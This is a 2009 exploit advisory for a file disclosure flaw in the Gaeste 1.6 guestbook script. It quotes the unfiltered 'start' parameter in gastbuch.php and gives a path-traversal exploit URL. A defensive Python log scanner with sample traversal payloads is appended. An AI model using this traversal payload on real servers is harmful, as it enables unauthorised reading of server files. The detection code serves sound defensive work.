Gaeste 1.6 (gastbuch.php) Remote File Disclosure Vulnerability

2009-02-09 07:03:14


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ +
+ +
+ +
+ bd0rk || SOH-Crew +
+ +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++



=> Vendor: http://www.php4scripte.de/

=> Download: http://www.php4scripte.de/download/gastbuchxhtml16.zip

=> Bugfound3R: bd0rk

=> Greetz: str0ke, TheJT, TheAJ, kretzi, DarkFig, Perforin ;-)

=> Vulnerable code in gastbuch.php, lines 2-3

-------------------------------

if (isset($_GET['start'])) {
    // Request parameter is copied as-is: no type check, no path filtering
    $start = $_GET['start'];

-------------------------------


[+]XPL0iT: http://[t4rg3t]/[gaestepath]/gastbuch.php?start=../../TARGETFILE.php


###The 20-year-old German hacker bd0rk###
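
The request shown above carries a file path in the `start` parameter, which leaves a clear signature in web server logs. The Python below is an added example, not part of the original advisory or of the Gaeste code: it scans combined-format access-log lines for requests to gastbuch.php whose `start` value contains path characters after repeated percent-decoding. The log lines, addresses, the /gb/ path and the benign value 10 are constructed sample data.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request line inside a combined-format access-log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation address ranges, assumed /gb/ path).
SAMPLE_LOG = [
    '192.0.2.10 - - [09/Feb/2009:07:10:01 +0000] "GET /gb/gastbuch.php?start=10 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [09/Feb/2009:07:11:43 +0000] "GET /gb/gastbuch.php?start=../../TARGETFILE.php HTTP/1.1" 200 812',
    '198.51.100.7 - - [09/Feb/2009:07:11:50 +0000] "GET /gb/gastbuch.php?start=%252e%252e%252fTARGETFILE.php HTTP/1.1" 200 812',
    '192.0.2.10 - - [09/Feb/2009:07:12:02 +0000] "GET /gb/index.php?start=../x HTTP/1.1" 404 209',
]

def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input is normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_start(line):
    """Return the decoded 'start' value if it looks like a path, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/gastbuch.php"):
        return None
    for raw in parse_qs(url.query, keep_blank_values=True).get("start", []):
        value = decode_fully(raw)  # parse_qs has already decoded one layer
        if any(tok in value for tok in ("..", "/", "\\", "\x00")):
            return value
    return None

def scan(lines):
    """Return (line_number, decoded_start) for every flagged log line."""
    hits = []
    for n, line in enumerate(lines, 1):
        value = suspicious_start(line)
        if value is not None:
            hits.append((n, value))
    return hits

if __name__ == "__main__":
    for n, value in scan(SAMPLE_LOG):
        print(f"line {n}: start={value!r}")
```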
